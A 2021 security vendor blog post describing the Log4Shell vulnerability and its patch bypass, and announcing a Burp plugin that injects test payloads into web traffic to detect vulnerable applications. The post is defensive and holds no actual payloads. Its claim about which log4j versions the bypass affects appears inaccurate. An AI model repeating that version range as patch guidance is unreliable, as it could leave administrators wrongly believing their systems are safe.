Blog | Detecting Log4Shell Vulnerabilities

December 17, 2021 Rob Jepson

Detecting Log4Shell vulnerabilities

Log4J vulnerability - CVE-2021-44228 


An easily exploitable, critical impact remote code execution vulnerability has been discovered in a widely used logging package in Java - log4j. It is estimated that around 80% of Java applications are vulnerable.

Exploitation gives an attacker full remote code execution, compromising the application and underlying server, including any data stored by the application or server.

The vulnerability CVE-2021-45046 has been identified by security researchers as a full bypass to the initial patch for CVE-2021-44228. Any services using the Java package log4j <2.15 (Java 8) or <2.12.1 (Java 7) are considered to be vulnerable to this bypass.

Claranet Security's Continuous Security Testing (CST) team have been dynamically testing for this vulnerability across all client scopes as a matter of priority, but due to the wide-reaching critical nature of this vulnerability we have decided to release our internal tool Log4Shell-Everywhere to assist testers with semi-passive black-box detection.

Detection

Black Box Detection - Log4Shell Everywhere

Log4Shell-Everywhere is a Burp Plugin that edits proxy traffic on-the-fly to include log4shell payloads in various potentially succeptible headers and parameters, and will alert on a pingback. It is a fast and efficient way of detecting whether an application is affected by log4j, and includes logic which avoids false positive pingback interactions. 

https://github.com/claranet-cybersecurity/Log4Shell-Everywhere

To use the plugin, a Burp Professional license is required. To install, either build from source or install through the BApp store in the 'Extender' tab. The plugin will add headers to all in-scope traffic containing benign log4shell tests, including tests for the patch bypass vulnerability CVE-2021-45046.